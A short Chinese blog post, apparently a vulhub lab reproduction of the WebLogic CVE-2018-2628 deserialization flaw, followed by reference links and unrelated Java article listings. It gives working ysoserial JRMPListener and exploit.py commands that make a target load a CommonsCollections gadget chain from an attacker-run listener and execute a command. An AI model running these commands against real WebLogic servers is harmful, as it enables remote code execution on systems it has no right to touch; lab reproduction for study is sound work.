【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。

并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。

第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。

这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

bash 复制代码
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

bash 复制代码
python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路

相关推荐
本郡主是喵4 分钟前
并发编程 - go版
java·服务器·开发语言
南风lof10 分钟前
源码赏析:Java线程池中的那些细节
java·源码阅读
pengyu11 分钟前
【Java设计原则与模式之系统化精讲:零】 | 编程世界的道与术(理论篇)
java·后端·设计模式
程序员岳焱17 分钟前
16.Java Annotation注解:元数据与代码增强
java·后端·编程语言
保持学习ing35 分钟前
黑马Java面试笔记之 集合篇(算法复杂度+ArrayList+LinkedList)
java·笔记·算法·面试
想带你从多云到转晴1 小时前
02. java: 类与对象
java·开发语言
酷爱码1 小时前
Java -jar命令运行外部依赖JAR包的深度场景分析与实践指南
java·python·jar
hstar95271 小时前
三十三、面向对象底层逻辑-SpringMVC九大组件之HandlerExceptionResolver接口设计
java·spring·设计模式·架构
面朝大海,春不暖,花不开1 小时前
Spring Security默认配置覆盖指南
java·后端·spring